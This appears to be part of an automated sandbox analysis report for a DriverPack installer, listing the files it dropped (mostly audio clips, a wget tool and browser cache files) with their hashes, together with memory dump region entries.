MD5 02466847c63e90c5041b8dd7990dce27
SHA1 fdcf71f16e2efcb8815730b4cca5f580b185cf5c
SHA256 195418a93d769a17558aa804568eff487979e62d0731aa8c63d8d0ffc1723321
SHA512 86b11957db369afa71831c72848b897aafd155887467a377484d0346dcaeaac88476cad2331e34a24e7f8ac3a07335dd1e639ae27bfa0d4491dcc6a48a7e6ff3

C:\Users\Admin\AppData\Roaming\DRPSu\Logs\log___2024-05-03-16-50-18.html

MD5 2ac5bc2a0268c1447d631bbf97e5b5a3
SHA1 ebd3d1a54163ab42a2282d213b93058654a9b384
SHA256 f34f2b31fdc2e95adab9911266beabe29de304051f3cfe693646ad933357f451
SHA512 60e01ab4bf5e2b99e66b70a45c7890e9ea506ef647991c72e578e0ba84e6997d23e851b6a5faf1ce50d2cbf1a0ce536b9a542c8abe108312a2d15b49d522aa5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\collect[2].gif

MD5 28d6814f309ea289f847c69cf91194c6
SHA1 0f4e929dd5bb2564f7ab9c76338e04e292a42ace
SHA256 8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015
SHA512 1d68b92e8d822fe82dc7563edd7b37f3418a02a89f1a9f0454cca664c2fc2565235e0d85540ff9be0b20175be3f5b7b4eae1175067465d5cca13486aab4c582c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\sync_cookie_image_check[1].gif

MD5 df3e567d6f16d040326c7a0ea29a4f41
SHA1 ea7df583983133b62712b5e73bffbcd45cc53736
SHA256 548f2d6f4d0d820c6c5ffbeffcbd7f0e73193e2932eefe542accc84762deec87
SHA512 b2ca25a3311dc42942e046eb1a27038b71d689925b7d6b3ebb4d7cd2c7b9a0c7de3d10175790ac060dc3f8acf3c1708c336626be06879097f4d0ecaa7f567041

\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe

MD5 bd126a7b59d5d1f97ba89a3e71425731
SHA1 457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256 a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA512 3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

memory/1204-1552-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\intro[1].mp3

MD5 691c1edc79b032ea6d150fc291b7613d
SHA1 56049f75783bbed2aae6d03eb91b752bb16548c3
SHA256 8fcbf2cede0ba798aabc145593b273d3c76596ca9bce0a3138684fa7b416359f
SHA512 df1623c1542bbfe3ca2e6505d46538e6ec0eebbde8d712e03d32e8c22aa2a5e62b8369a3ae9263139f0e523826c15749c188b2005212ce6eb2e033054fdcaaa4

memory/2520-1551-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1012-1550-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1684-1549-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2528-1547-0x00000000023F0000-0x00000000024DF000-memory.dmp

memory/1088-1546-0x0000000002280000-0x000000000236F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\START-SETUP-1.mp3

MD5 5dfd5ac5c08a629db586c6b737905ffd
SHA1 7d7418ec5c0099ce47476cfc63d160ae2f25d16d
SHA256 f01ce28bdb7af9b93ed9e255d5f2c4b7860c97d2f0d58339dbd489828b3484ba
SHA512 90e301b3cc64ba21517823767f5ac44dfd72fcc64eb40b5156c1186c466f2bf1a3e2035f316ee55709051fa47a1fd344e5fddfc88586a55396481e59adedd26d

memory/2520-1568-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1204-1577-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1012-1584-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\START-INITIAL-1.mp3

MD5 95c290a75e2d3d44f0d76142508edcf6
SHA1 a090827bd93cbe812e32d81272f7cfe9a9b31b4a
SHA256 7ce172ba3df0c381dabc6688dc584035860052b57242ec01ee3adc60ccb3bbc3
SHA512 f2bc1232896eefd0b7e27158067bffaa4bacd602a2fd948896ee6123dbb0ad504084f3ced7a9efa3e7c444a1301126f95ae6466fa7004d9c30661dc62b5c9bd3

memory/1684-1598-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2440-1602-0x00000000004C0000-0x00000000005AF000-memory.dmp

memory/2492-1603-0x0000000002320000-0x000000000240F000-memory.dmp

memory/2440-1605-0x00000000004C0000-0x00000000005AF000-memory.dmp

memory/2632-1607-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2524-1609-0x00000000022C0000-0x00000000023AF000-memory.dmp

memory/1068-1615-0x00000000023A0000-0x000000000248F000-memory.dmp

memory/1712-1617-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2380-1613-0x0000000000580000-0x000000000066F000-memory.dmp

memory/2440-1625-0x00000000004C0000-0x00000000005AF000-memory.dmp

memory/1660-1628-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1092-1627-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2464-1637-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1960-1646-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_38778.txt

MD5 d0d964be87663c957866cc96319a0f2e
SHA1 5a4af1923a1aa9fbdf7f92e9afbc2e47a0297e7f
SHA256 9a25234ae91ada142892f61bb4a52640d8854872909068b7b1c307a8e16591ed
SHA512 6f4ded4aeca348cd9234ca0ab1db569338793c586e086db06580a1a879c0c62258fcdfc25fe80d7da376508edd9f023d07183ab89c70ed8663d338ac4163b1e1

memory/2632-1673-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1712-1677-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JB8Q1DZR\TEAM-PROOF-3[1].mp3

MD5 9935dc6db273291e14ce227eb0542ad9
SHA1 12013732b5d399fa86cff55401345cce39346389
SHA256 91c9b43045e05c5ea9debee09aec46356c9a286369569508181117ac98f6c487
SHA512 37b44a39355a641f3ebcb5cab7dffd03eb67e8c519f384972bd56438ace4065d36c3a26352a9b5065e0365f891dd1a0adc683cc9c0970ff4ce6799feaf3b845d

memory/2824-1689-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1092-1668-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JB8Q1DZR\TEAM-PROOF-2[1].mp3

MD5 50981b671fbad5e721b83245563dcb66
SHA1 42db8a6291d1f3b33a58a505b446c08e13f7d3c3
SHA256 09bd89dd7b59b6403c9fc495d8e4780840f9ade3ae9744f684e90876b250f981
SHA512 9c7cddbfce10dca0c5359860fe5791be90d3e8a27f77c8c500d9cc8ab180ad691c4a3c9a8044df7577efbb9716150b7cdc23800e54264e2a92af0b4f34b8f1a3

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\TEAM-PROOF-1[1].mp3

MD5 7eb9029ffd20e9f7d7e496bb74c581e4
SHA1 edc1dcea8f1bf44e16c25ee5ef7e3303494aa835
SHA256 07eca9f5ef7741062a9081a42dc70200ab38b0a48f31ac62393332ac24e97089
SHA512 4de329408e48b6e78fabfd37b2a710be76550b822df1a6248f8596c4363e311226b2f03bd4fd2c8ae2d2a5efb57fa87edda5a19594755618336597c02ec15f63

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-DRIVERS-3.mp3

MD5 4314c886eb7bce481ec3209b96fad7f8
SHA1 e365140263b4903945d6b20926b3b1c66c8d6998
SHA256 540abfdf5e2894d09dded9dfffe2d1be207b484f32f8e0aa237aba52142eeb8a
SHA512 9f83709548764477e812157b86fbd0d958b189861b59e8b2f308f734be04f15f8b82938c178b4eda5ee23c12176791f3792ced856ab3f2fd4391513ee37eb706

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\CONTINUOUS-2.mp3

MD5 9dc08ae4415c783e8e6f7658423def22
SHA1 88a708d3e775dc03f72077217561c4ac12d4f801
SHA256 a3857040e7a5e315d3fbab41ddb232465fc2b57db4aaedef2f3b74c699f01a8a
SHA512 e83e84d6abff2571b97fce5883e37da3aec99c1bff7064a7ba8857da6c13ceed9ddbef26ab37e36f88b85c81e3979cd76f454aa3a22a41e52ec715c6546366cc

memory/1660-1659-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2820-1657-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-DRIVERS-1.mp3

MD5 540072f31fd5aa996268425beac11da8
SHA1 2aee0efdd9ed72e969a1bfa8bc4c84656f972f80
SHA256 1f19a45b24a98014ab4821a1c80b1d2120f54e24cf2517b73f015141d6aa98ed
SHA512 477fa6616ce8a55f5e6e7d0e28eba3e821189a08edc11a238b1066a4ae0f4930c85c5684e2570110f30cd04f4db5ecc230c1088a511f46ac5b8fa2168e72ceb1

memory/2544-1626-0x0000000000440000-0x000000000052F000-memory.dmp

memory/2464-1624-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2544-1623-0x0000000000440000-0x000000000052F000-memory.dmp

memory/2828-1622-0x00000000023F0000-0x00000000024DF000-memory.dmp

memory/1068-1616-0x00000000023A0000-0x000000000248F000-memory.dmp

memory/2380-1614-0x0000000000580000-0x000000000066F000-memory.dmp

memory/2524-1608-0x00000000022C0000-0x00000000023AF000-memory.dmp

memory/2492-1606-0x0000000002320000-0x000000000240F000-memory.dmp

memory/1660-1604-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2476-1600-0x00000000023C0000-0x00000000024AF000-memory.dmp

memory/2464-1601-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2916-1708-0x0000000000460000-0x000000000054F000-memory.dmp

memory/992-1707-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2916-1706-0x0000000000460000-0x000000000054F000-memory.dmp

memory/2968-1710-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1612-1715-0x0000000000420000-0x000000000050F000-memory.dmp

memory/2528-1717-0x00000000023A0000-0x000000000248F000-memory.dmp

memory/1612-1716-0x0000000000420000-0x000000000050F000-memory.dmp

memory/2884-1709-0x0000000000490000-0x000000000057F000-memory.dmp

memory/992-1733-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\ANTIVIRUS-2.mp3

MD5 b9d3ff97b96457be067dfc0b4bf06cf8
SHA1 ef1d8323a077aec206027af7616843708e898e9f
SHA256 c87feb5bd45ff4ffb897f53c22e3e2f5732ad49d124724248a06627162bc40ab
SHA512 c0e09060fb1c32d296abd0baebf741b5410ed3923da3b942f6e9d2510323cc223597fd0f7d4c7eb78116df0036d5f9d19115305db104eaa8671e3809672a80b2

memory/2968-1739-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\ANTIVIRUS-3.mp3

MD5 79f67c4b6d219574c7ce29e43d6f8256
SHA1 fdd8dc2e990632b8e76d1c40e4db54c7dcdaf781
SHA256 1d23cba7b365efc03cf981a61ad2faf55a93740e077e1ab6569a2ec2c58191fd
SHA512 17ae04ed13d0aebf2668a72f97b761a41fd7b221f7fdd3d01a83711498d18efe2ef452c95547ea6aed1b3937e48e4bcf2729a821b855d1f6c68e287a43ce5364

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\CONTINUOUS-3.mp3

MD5 940828d405c4c92f0bdf931169b6bf14
SHA1 65915dd5622e2ada803525fb3dd259d36546d43f
SHA256 88d420fb6a0a847c522066698efec070203c436aa5e2ff2097bb2e5e3692150b
SHA512 ac18701cb3d4d1e51bd88b35a3be09ee8fd7058e1b4679b5ca8c7e0688f1e27ab834bc955939fd94a2487327f251647c9f46285bfcabb07b2b1bf40e713ad5a4

memory/2596-1744-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2068-1751-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2688-1782-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2912-1781-0x0000000002300000-0x00000000023EF000-memory.dmp

memory/2912-1780-0x0000000002300000-0x00000000023EF000-memory.dmp

memory/2832-1789-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1484-1791-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/108-1790-0x0000000000360000-0x000000000044F000-memory.dmp

memory/3020-1788-0x00000000004F0000-0x00000000005DF000-memory.dmp

memory/3020-1787-0x00000000004F0000-0x00000000005DF000-memory.dmp

memory/2688-1802-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1484-1817-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2832-1815-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\EXPERT-DRIVERS-2[1].mp3

MD5 009af8af189f6446d8ac3552dc659623
SHA1 77878aa1bb829fcf950fcf0bacd0b5f89e44fbc4
SHA256 9f35f0dbff0fbd1362b8f221550bf9d63e5d30ee8487bb47c78edb1661a52b9b
SHA512 88fe7b3bf30ab34976d5f9ead3dce16861c19810bec70c32a7e651d75842390b0a024bd40ad070d0bf5665b4ef62795f03acaa8070aee2f79165797624bfc9fc

memory/932-1857-0x0000000002360000-0x000000000244F000-memory.dmp

memory/332-1860-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/932-1856-0x0000000002360000-0x000000000244F000-memory.dmp

memory/2072-1864-0x0000000002370000-0x000000000245F000-memory.dmp

memory/2072-1863-0x0000000002370000-0x000000000245F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-PROGRAMS_CHECKBOX_USED-1.mp3

MD5 c2f74bfffef77facd142047ec62053d1
SHA1 6705db85b4d1fb0154862d47112e0a300d5df401
SHA256 90b0c57398a3dc95f089121e0873719e3fce5978a66bc3f8468fdb375287d37a
SHA512 683339571a0cf5597087f5b779673ff65be19fa29c00b9a82638ead328ec790e4066ea32f32bedcf15e09febe738153b9c79a23173b00bdcfd06e563365bfe02

memory/332-1925-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1908-1939-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-PROGRAMS_CHECKBOX_USED-2.mp3

MD5 c32b72662de149efdde414c6f62b755a
SHA1 219b03d40974b059bb3a162f61c2aa1446d0fa51
SHA256 a5062cbc572ce18afb6e590a74a299f288c593de995841c13981c25a5cc3fcf1
SHA512 f57805be7b781fbc160cabbe2594f3f0aaa45d74608eff486ec077b065abcd87ced756f60ede04d1c9b55bed2932fb7fceabc56e22aa80ec719fb62c6247cbbf

memory/2316-1981-0x00000000022F0000-0x00000000023DF000-memory.dmp

memory/2800-1986-0x0000000002300000-0x00000000023EF000-memory.dmp

memory/2800-1987-0x0000000002300000-0x00000000023EF000-memory.dmp

memory/2916-1985-0x0000000002300000-0x00000000023EF000-memory.dmp

memory/1556-1984-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2916-1983-0x0000000002300000-0x00000000023EF000-memory.dmp

memory/1344-1982-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2636-2000-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-PROTECT-3.mp3

MD5 f0f1e1787b8a0a7080bb3b20cbefb6f1
SHA1 af6cd03851f375bd3606a47693ed7cfac3a91401
SHA256 996744756df49ce498243a7fcd70cf5cc9c55f399b8027ed712485c6843d1ced
SHA512 74075cf3563b27fee97792a20a8953b652a7047c60e82d70e7595159f5e132f3435349e19784d71252fb134a234b603917b5418c919ce4ac068de65692610a75

memory/1344-2005-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1556-2015-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-PROTECT-2.mp3

MD5 b93826701c603537a71054bca4cde2f4
SHA1 28e4e28877a3fc864c42072770e604790656d98f
SHA256 82d48381d03dba7f4a566420a4921553c6aa15bc6a22bc6e08bb6e8466af8274
SHA512 8231dda9f00aa4517f2b43d55df704296615bb0022e3a04c779295382ea3866f194741b77838fc516cf1f4d1ce59801cb80a98ee010e9b3a719bb28155e3b6dc

memory/568-2018-0x000000007EF20000-0x000000007EF30000-memory.dmp

memory/2500-2021-0x00000000022B0000-0x000000000239F000-memory.dmp

memory/1724-2020-0x0000000002410000-0x00000000024FF000-memory.dmp

memory/1356-2025-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1548-2024-0x0000000002320000-0x000000000240F000-memory.dmp

memory/1748-2032-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1316-2031-0x00000000023A0000-0x000000000248F000-memory.dmp

memory/1316-2030-0x00000000023A0000-0x000000000248F000-memory.dmp

memory/2284-2050-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1748-2048-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1356-2046-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1484-2062-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2180-2067-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-DIAGNOSTICS-2.mp3

MD5 7afb5dcd2817c489e3a501b6e13c9729
SHA1 87ed1fdfd13c41d3e5afc9b9d2f9a5d843e79bca
SHA256 37570e3dd380a1c779db17d7b4ee8b0ca4a25a2302f7112f087c7ab7dc7da517
SHA512 3bd1eba015c363e685e1f7f916c7f522459b4d1fb6e8be678516180d460405097fd4f568c4cd70123fb434037e95ccd607cba36c388283286c9e1a9a98e95aad

memory/2636-2073-0x0000000002400000-0x00000000024EF000-memory.dmp

memory/3060-2074-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/3060-2082-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2316-2085-0x0000000000120000-0x000000000020F000-memory.dmp

memory/992-2084-0x00000000023D0000-0x00000000024BF000-memory.dmp

memory/832-2097-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1588-2103-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-CONFIGURATOR-3.mp3

MD5 991ab55460152ce376b9bf282d7a2569
SHA1 294f940c04d58624aa4099d48e7752dc54f651d1
SHA256 78ae68bedd64b4cae4dadcf69c184b62c709756f9e2128bb178311431b4129ee
SHA512 4b470c1766eeb3a22d125768c0e7691cf81b9eb500f0e910bba2546601419a2a56bda79dc8e7bb7be56e71396ad09b6f3565242934b9f3ad02b31b7cc98f918b

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-CONFIGURATOR-2.mp3

MD5 3c47fb862e42d7a657bb02ddacde77d7
SHA1 09d56b2f04121e0a59a5439499c3dd10fecfaf2a
SHA256 5a3e6a91181f9c87c354447d4e8c06a49cebfd06b2bb76683f44bb6a3200ee86
SHA512 9c19726deca2c6c509d1e3b74aecbe7aabb596f081a16c05d2f3a7691d1978bbbf5201bdb2fc09f0ece6e99308aed63ca51552fa020c379dff85ebdb1f8fe7d8

memory/2584-2112-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2480-2117-0x0000000000D60000-0x0000000001315000-memory.dmp

memory/2968-2115-0x0000000000D60000-0x0000000001315000-memory.dmp

memory/2884-2116-0x0000000000D60000-0x0000000001315000-memory.dmp

memory/1944-2114-0x0000000000D60000-0x0000000001315000-memory.dmp

memory/1752-2118-0x0000000000D60000-0x0000000001315000-memory.dmp

memory/2444-2127-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/344-2142-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\CONTINUOUS-1[1].mp3

MD5 efa6f5d70c558614f18c17d54c155fe9
SHA1 5fcd5fe13f7e8dcb80c8f3f3febf6cdd00c67c9e
SHA256 571aed8d5306ecfa709dc894f6fe66176bc99380ee42694328b3da237fd6b989
SHA512 0e89ef7cb550ed7340b7e7fb612273938c5b0ce61edb8f4aca1782982067fbb51d099ae2fdf27782173ba0182f487c9fc6b11fe67b109f0c510ef8f2dc8f35cd

memory/1528-2157-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1892-2160-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2168-2161-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2200-2179-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2776-2176-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2548-2180-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UA1HZF3D\ANTIVIRUS-1[1].mp3

MD5 7557d8cd4046327c15d600a1d2c94179
SHA1 c5cdb72ff869186fd49bf444b72186d6c64a230c
SHA256 46d1565a9237f7ade1d03a2d70c084f5f688d6a0574220ecc5eb83d5cfd875ed
SHA512 a56981e7b3c9757ff6e11373b5a75e66d70d1f3f5d3539cc647bb229784ba5dc52199eaa4f3f01d9d3fe3ab9730a90fb5e724e3fdfe54bed12e512f76d67a194

memory/2372-2201-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1520-2210-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2460-2205-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\COMPILATION-3.mp3

MD5 f517d3db373a1e0842cbdca22ea116d5
SHA1 8fad391e34ac78262055e700668b10150b99590e
SHA256 0069a0aa7fe69bebf3154744535e3b52ced7362e07e0e832698629f68c02785d
SHA512 4a4ee5244476b32b6d1a25e1fcfe040eb50729d31560ad5e6273290e721bf4c523a89b2a821b90fc02e541ff5f7fac0cafbf4775020dc4d8047cd0fcf183b4f2

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\COMPILATION-2.mp3

MD5 23729fcb2e9a23176d38d28f15bf66f9
SHA1 514b08f62314a23819c58028500a0db307a97089
SHA256 d25c6a14bf6694641f0237ddeb0aef74112e1cae7acf77f753cbe20bb8bbd203
SHA512 1cdc4d9f4c5b5c5b81169b4e9191ca9aeb5bf5ed80abb0af38101df633716f62fff99d234a4b42ac080a3129112a485970b67c3534d21740ca2ce4c4ea5475de

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\SERVICE_MODE-2.mp3

MD5 553f50841fc352613d9aa55c274b6006
SHA1 549f79fca4f2d46b5351d35a2f13ea1f6ece37a7
SHA256 527f93a6a3159de9a01242e8a1f85c568651bd711da175e5a6c9fe1942224b97
SHA512 e3b3577b6de4321e913a700c7d53252a905740c98ddde04a1dc305f0a2197535cacf5bc29261dacf06b68b8ea4f6a97ec51d067f9c9dbc3243f7518d2da87f22

memory/2772-2234-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1908-2239-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\ISTART_3.mp3

MD5 5b0d0736e58d2f3cd4a7aa60c9977677
SHA1 3b4774e95fe9e1b66ec856ce4ff15a3437bed244
SHA256 23a69131f2b1ea74723a087a9e0137c202f4f9439c165c6f0784b2fde7d3e7b6
SHA512 976d76ea6e00c4eeccc9aceba01cab51a096af245ce06b597c61da1062a3f40ce49374fa04c6e9c98fdcb175339d10da5ab547f8c675508cabac83f5f9d46121

memory/1540-2262-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/2828-2267-0x0000000000400000-0x00000000004EF000-memory.dmp

memory/1104-2275-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\ISTART_1.mp3

MD5 196dd2bdcbe9ffec4b388f53334c7034
SHA1 6fa9101d10628145ccc7705bdee98638f45a420a
SHA256 815f5cdc4f714576ff9e5b6ccab5c4cd227aa87add8237b3e5a88913867e8ce5
SHA512 77805a848bcf17aa4b37d8c06d2aee0fa3dcddfbb0b76aaea929e90a293c7c3bd463df5098ac21cb07110e729e896fd32089010a306f001057c47fd8a66f8721

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\ISTART_4.mp3

MD5 cb1671a5e76e2f608f5c41e041236264
SHA1 8ab07b65b9fe00b8d048af0cd7c67800b140d08c
SHA256 618eb740f1dcaf902215f7a3d77d69a1a07bcc46ee9e96156d524d1eb3ee38f2
SHA512 0da2958b38d87cb94f20775ff14538e13184dbbdceb3380a1ec48e630b142011ac9784be65c697870f59de66a1eb8c10fdb91d5532e4a4f6b3eeb2cb92ec9be4

memory/2540-2284-0x0000000000400000-0x00000000004EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\WAITING-1.mp3

MD5 26d845b49a19513397ccd2abe6312682
SHA1 88c4d60e6c73af38bdce1fc346d129b9ec6bd937
SHA256 cc85ff5e54762063c62237ff6e23c59fafe4ccc5b91333aefcc4286b6eb5c68a
SHA512 b9571a5eb1e492b0ba5b260d4ce0e62d507b5cc124b1c092b6d4ab457b7e0612517baa893a04725739f647c8d4a0e1f384443e21d72d48852fa55af9ecd1b6b3

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\DRIVERS-2.mp3

MD5 dd951f2ac6c9f11c3dfe531dd2d9c07f
SHA1 345e204904b4b84984a10ac8e662a96b2e6cb24e
SHA256 f7a19341356126b54bbf079b8b99327fe00c4d272044eacd998fbb92beea5264
SHA512 93d91981900f2124fa4cd3fddcfb7465999f4fd7d5513f77e43788954f63532723ed90bb7e13671a3329497123b6efa19526827614f19f00e49d9f5ce53c4f29

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\FIREFOX_3.mp3

MD5 715b497fa91723fb1b30c0cd0a67eab3
SHA1 6489649db2ff71691956a981a268adf933824219
SHA256 9be2db6fb90629dd5bfd52b4f65c4d8003898ea90e5ec782f457992421dfb9d8
SHA512 bfb914f5c0347c14f0bf9879dece9ffbd9930a67d9fa944723331ee6c262ac38d7bc27e3566fc2a342348fcab11c9ca6a2c10843d6d785aac0cb2e1029edd215

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\FIREFOX_2[1].mp3

MD5 1bc80d7024845a43edc7559799579473
SHA1 2e433c5eea67ce0000a1c9cf058c490afbd0433a
SHA256 b23a657c71fe2018693a1d639c16b03612a519c57f429d33e5c63d5f6c30ddab
SHA512 54bf08510d4aa74b77e5d7d8f7b01c54fbcc42f84ac1df953268c83bfdb3d91538cc2c0ce6e85dd66089ce45bd023722e143190599a860e6580cae121cc54313

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\FIREFOX_4.mp3

MD5 162c38f5bc52dec28a7331b590ea424e
SHA1 5f41060580c761befce364b46697a24512b8fddd
SHA256 b87cf0a5c959dd1d0dcaf31efc0516c04ec2521bb1429e018f7a872f90ba64b4
SHA512 d8764f6a8d29cd675763c506f12d7d774505fd9a50e5dc152015c79e1aa7ae706cdc53374eadd09ddf783b1acc043cace6488f8232dc56c6b44e240b266e9b2b

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\UTILS-1.mp3

MD5 7095c6016cbf641e2801355f08787e62
SHA1 f1b979c664617653a4042ec95b8c842b08ce6c24
SHA256 9f840f4f833f01481aebf60021efae968a9ac6195bcbc8314f884460d92997e7
SHA512 c60ddf43e84322186f9d86e55bc4e21c3127df531289329b58d928d43f86978300579a7c88603472b6c986dcf0e9ee1970058107598f30b24d933d6a435bb32e

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\UTILS-2.mp3

MD5 706d79a1d2f259827c0201db765e3b26
SHA1 9d75a75a1798e847753783116e895877c24d62e5
SHA256 49489b2aa79a57ed2ab8231b0d127b46c3ef704f95647e219447b12713416088
SHA512 dea0a07c7d8aa86eeb05aa2b02db1eac23e8bd8d4a34154a4414dffa7c9e13bf5fd9b6d75287233b9718e02fad11d5531c911d663f83627dd0ceb06b3cc8ba15

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\RELIABILITY-3.mp3

MD5 463630700b55c6f0a98683eaa5f5a45e
SHA1 2fd69f67afa9e0f04702fb445670d5c8789499d6
SHA256 346010e2fa732c68f0033fc481b43723de0b2d092a943401de8ec17e8c0b35d5
SHA512 6ef3a22300427106351d3976b4498fc1d17811f6f56296e2ad215d65e9a86bffc468089f635b0decf44e19a879df1401c5d118037b561c697e453c32664646ab

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\RELIABILITY-2.mp3

MD5 8714bb7cc335a42188f0fbcf9c15665d
SHA1 e3d8d2ae2b9c28c8a6134988d1077527f752ad98
